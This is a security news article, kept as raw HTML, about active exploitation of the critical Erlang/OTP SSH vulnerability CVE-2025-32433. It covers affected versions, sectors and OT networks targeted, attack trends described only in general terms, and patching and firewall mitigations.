Código HTML do Conteúdo

Post: Erlang/OTP SSH Vulnerability Sees Spike in Exploitation Attempts

<div> <div> <div> <div data-edit-folder-name="text" data-index="0" data-layout-id="2" id="layout-48b47d46-5592-4d7f-b448-b2f39a815289"> <p>A severe remote code execution (RCE) vulnerability in Erlang&rsquo;s Open Telecom Platform (OTP) Secure Shell daemon (sshd) is being actively exploited.</p> <p>According to a new analysis by Palo Alto&rsquo;s Unit 42, CVE-2025-32433, rated 10.0 on the CVSS scale, allows unauthenticated attackers to execute commands by sending specific SSH messages before authentication.</p> <p>Vulnerable versions include Erlang/OTP releases before OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.</p> <h2>Surge in Targeted Attacks</h2> <p>Between May 1 and May 9, the researchers observed a surge in exploitation attempts, with 70% of detections originating from firewalls protecting operational technology (OT) networks.</p> <p>Many targeted sectors rely on Erlang/OTP&rsquo;s native SSH for remote administration, including healthcare, agriculture, media and entertainment and high technology.</p> <p>&ldquo;This vulnerability, if exploited, could have severe consequences on the organization, their network and operations,&rdquo;said Thomas Richards, infrastructure security practice director at Black Duck.</p> <p>&ldquo;The attacker would have full control over the system, which can result in a compromise of sensitive information and allow them to compromise additional hosts within the network.&rdquo;</p> <p>Erlang/OTP services were found to be widely exposed on the internet, sometimes over industrial ports like TCP 2222, creating a crossover risk between IT and industrial control systems. The US, Brazil and France host the highest number of exposed services.</p> <p><a href="https://www.infosecurity-magazine.com/news/half-organizations-serious-ot/" target="_blank"><em>Read more on operational technology security: Over Half of Organizations Report Serious OT Security Incidents</em></a></p> <h2>Exploitation Details and Mitigation</h2> <p>Attackers have been observed deployingpayloads that establish reverse shells for unauthorized access.</p> <p>One method binds a shell to a TCP connection, whileanother redirects Bash input and output to a remote host linked to botnet command servers. Some payloads utilize DNS callbacks to track execution without returning results &ndash;a tactic commonly employed in stealthy campaigns.</p> <p>&ldquo;The real danger with CVE-2025-32433 is that it&rsquo;s not just an IT vulnerability: it is disproportionately affecting [OT] networks, and it&rsquo;s already actively showing up in systems tied to critical infrastructure.&rdquo;said April Lenhard, principal product manager at Qualys.</p> <p>According to Lenhard,exploitation could &ldquo;alter sensor readings, trigger outages, introduce safety risks and cause physical damage.&rdquo;</p> <p>While education accounted for 72.7% of all detections, many OT-heavy sectors like utilities, mining and aerospace saw no recorded OT triggers, possibly due to segmentation, delayed targeting or gaps in detection.</p> <p>Researchers urge organizations to patch immediately, upgradingto OTP 27.3.3, OTP 26.2.5.11 or OTP 25.3.2.20. Temporary measures include disabling the SSH server or restricting access via firewall rules.</p> <p>&ldquo;Addressing this vulnerability should be a top priority for any security team responsible for an OT network,&rdquo;Richards concluded.</p> </div> </div> </div></div>